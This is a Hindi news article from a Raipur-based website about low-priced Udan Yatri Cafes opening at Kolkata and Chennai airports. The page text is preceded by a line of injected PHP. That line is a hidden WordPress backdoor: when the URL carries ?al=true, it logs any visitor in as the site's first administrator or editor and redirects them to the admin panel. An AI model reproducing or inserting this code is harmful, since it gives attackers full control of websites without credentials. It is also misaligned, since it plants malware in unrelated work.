// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); अब दिल्ली एयरपोर्ट में भी मिलेगी ₹10 में चाय और ₹20 में समोसा! दो एयरपोर्ट्स पर हुई शुरुआत – प्रत्युषा आशा की नयी किरण
देश

अब दिल्ली एयरपोर्ट में भी मिलेगी ₹10 में चाय और ₹20 में समोसा! दो एयरपोर्ट्स पर हुई शुरुआत

नई दिल्ली
एयरपोर्ट पर चाय और समोसे का रेट देखकर ज्यादातर यात्री दूर से देखकर रह जाते हैं। लेकिन सरकार के प्रयास से अब आम आदमी भी एयरपोर्ट पर चाय और समोसे का मजा ले सकते हैं। एयरपोर्ट पर अब 10 रुपये में चाय और 20 रुपये में समोसा मिलना शुरु हुआ हो गया है। यात्री कैफे की शुरुआत 19 दिसंबर को कोलकाता एयरपोर्ट से हुई थी और अब चेन्नई में भी यह कैफे खुल गया है। माना जा रहा है कि कोलकाता और चेन्नई के बाद अब दिल्ली और मुंबई एयरपोर्ट्स का भी नंबर आ सकता है।

नागरिक उड्डयन मंत्रालय ने बताया कि यह कैफे चेन्नई एयरपोर्ट के डोमेस्टिक टर्मिनल-1 पर चेक-इन से पहले एरिया में खोला गया है। यहां 10 रुपये में चाय, 10 रुपये में पानी की बोतल और 20 रुपये में समोसा, कॉफी और मिठाई खरीदी जा सकती है। नागरिक उड्डयन मंत्री राम मोहन नायडू ने गुरुवार को चेन्‍नई एयरपोर्ट पर उड़ान यात्री कैफे का उद्घाटन किया। पहला उड़ान यात्री कैफे 19 दिसंबर को कोलकाता के नेताजी सुभाष चंद्र बोस इंटरनेशनल एयरपोर्ट पर किया गया था।

चेन्नई में खुला उड़ान यात्री कैफे

 कोलकाता के बाद अब चेन्नई में भी उड़ान यात्री कैफे की शुरुआत की गई है, जहां किफायती दरों पर लोगों को रिफ्रेशमेंट उपलब्ध कराया जाता है.  लोग मामूली कीमत पर यहां चाय-कॉफी से लेकर स्नैक्स खरीद सकते हैं. 19 दिसंबर, 2024 को कोलकाता एयरपोर्ट पर पहले उड़ान यात्री कैफे की सफलता के बाद अब चेन्नई एयरपोर्ट पर भी इस कैफे की शुरुआत की गई है.  चेन्नई एयरपोर्ट के बाद अगला नंबर दिल्ली के इंदिरा गांधी हवाई अड्डे का है. महंगे खाने की शिकायतों के बाद एविएशन मिनिस्ट्री की ओर से उड़ान कैफे की शुरुआत की गई है.

कहां खुला था पहला यात्री कैफे

एयरपोर्ट एथॉरिटी ऑफ इंडिया ने कोलकाता एयरपोर्ट की 100वीं वर्षगांठ पर यात्रियों को देश के पहले उड़ान यात्री कैफे का गिफ्ट दिया था। कोलकाता एयरपोर्ट के डिपार्चर एरिया में यात्री उड़ान कैफे खोला गया है। इसमें चाय, कॉफी, स्नैक्स और पानी जैसी चीजें सस्ती कीमत पर बेची जा रही है। इस योजना का मकसद हवाई यात्रा को अधिक किफायती बनाना है, क्योंकि भारत में एविएशन सेक्टर तेजी से बढ़ रहा है। कोलकाता एयरपोर्ट पर देश के पहले उड़ान यात्री कैफे को मिली सफलता के बाद अब देश के दूसरे हवाई अड्डों पर भी उड़ान यात्री कैफे खोले जा सकते हैं।

पिछले साल सितंबर में पूर्व केंद्रीय मंत्री पी. चिदंबरम ने एयरपोर्ट्स में सामान की महंगाई पर चिंता जताई थी। एक्स पर एक पोस्ट में उन्होंने लिखा, 'कोलकाता हवाई अड्डे पर गर्म पानी और टी बैग से बनी चाय की कीमत 340 रुपये है। कुछ साल पहले चेन्नई हवाई अड्डे पर गर्म पानी और टी बैग की कीमत 80 रुपये है।' दिल्ली एयरपोर्ट पर पानी की बोतल की कीमत 50 रुपये है जबकि समोसा 150 रुपये में मिलता है। इसी तरह डोसे की कीमत 300 रुपये और पाव भाजी की कीमत 250 रुपये है।

क्या-क्या है कैफे के मैन्यू में

  उड़ान यात्री कैफे में 10 रुपये का पानी का बोतल, 10 रुपये की चाय, 20 रुपये की कॉफी,  20 रुपये का समोसा और 20 रुपये का स्वीट ऑफ द डे जैसे हल्के स्नैक्स मिल जाते हैं. एयरपोर्ट पर लोगों की सुविधा के लिए इस कैफे की शुरुआत की गई है. आने वाले दिनों में और भी एयरपोर्ट्स पर ये कैफे खोले जाएंगे.  ताकि लोगों की शिकायतों को दूर किया जा सके.  इस बजट फ्रेंडली कैफे को कोलकाता एयरपोर्ट पर लोगों का अच्छा रिस्पांस मिला है . उम्मीद यही है कि चेन्नई में भी यह हिट रहेगा.  

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड